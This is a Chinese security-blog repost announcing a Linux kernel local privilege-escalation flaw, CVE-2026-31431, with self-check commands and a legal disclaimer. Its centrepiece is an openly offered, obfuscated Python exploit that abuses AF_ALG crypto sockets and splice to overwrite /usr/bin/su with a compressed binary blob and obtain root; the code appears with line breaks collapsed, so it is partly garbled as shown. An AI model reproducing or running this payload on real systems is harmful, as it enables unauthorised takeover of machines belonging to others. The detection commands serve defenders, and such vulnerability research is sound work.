文章总结: CVE-2026-31431是Linux内核的核弹级提权漏洞,CVSS评分9.8影响所有主流发行版。攻击者可通过AF_ALG套接字利用附带的Pythonpayload实现瞬间root权限。文档提供了漏洞检测命令、受影响版本清单及缓解建议,属于高危零日漏洞。 综合评分: 87 文章分类: 漏洞分析,漏洞预警,Linux安全,应急响应,红队
Linux曝出“核弹级”漏洞CVE-2026-31431:攻击者可瞬间提权
原创
安全攻防屋 安全攻防屋
安全攻防屋
2026年4月30日 18:57 浙江
在小说阅读器读本章
去阅读
文章中附详细payload。
4月30日,安全圈被一则消息引爆——一个编号为 CVE-2026-31431 的Linux内核严重漏洞被公开披露。该漏洞影响所有Linux系列产品,包括但不限于Ubuntu、Debian、CentOS、RHEL、SUSE、Arch Linux、Alibaba Cloud Linux、TencentOS等主流发行版。
漏洞评级:严重(Critical)
CVSS评分:9.8/10
payload
#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4
以Ubuntu24.04版本为例,演示如下,成功拿到root权限。
自查:你的系统是否受影响?
快速检测方法
# 1. 查看内核版本uname -r
# 2. 检查是否可创建AF_ALG socketpython3 -c "import socket; s=socket.socket(38,5); print('Vulnerable' if s else 'Not')" 2>/dev/null
# 3. 查看内核配置(如有权限)grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)
受影响版本清单列举
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全攻防屋 安全攻防屋 安全攻防屋《Linux曝出“核弹级”漏洞CVE-2026-31431:攻击者可瞬间提权》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论